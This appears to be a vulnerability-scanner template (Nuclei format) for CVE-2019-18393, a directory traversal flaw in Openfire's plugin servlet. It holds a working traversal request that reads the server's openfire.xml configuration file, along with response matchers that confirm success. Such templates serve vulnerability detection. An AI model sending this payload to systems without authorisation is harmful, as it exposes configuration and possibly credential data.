id: CVE-2019-18393 info: name: Openfire LFI author: pikpikcu severity: high description: PluginServlet.java in Ignite Realtime Openfire through 4.4.2 does not ensure that retrieved files are located under the Openfire home directory, aka a directory traversal vulnerability. reference: https://swarm.ptsecurity.com/openfire-admin-console/ tags: cve,cve2019,openfire,lfi requests: - method: GET path: - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml' matchers-condition: and matchers: - type: word words: - "org.jivesoftware.database.EmbeddedConnectionProvider" - "Most properties are stored in the Openfire database" part: body - type: status status: - 200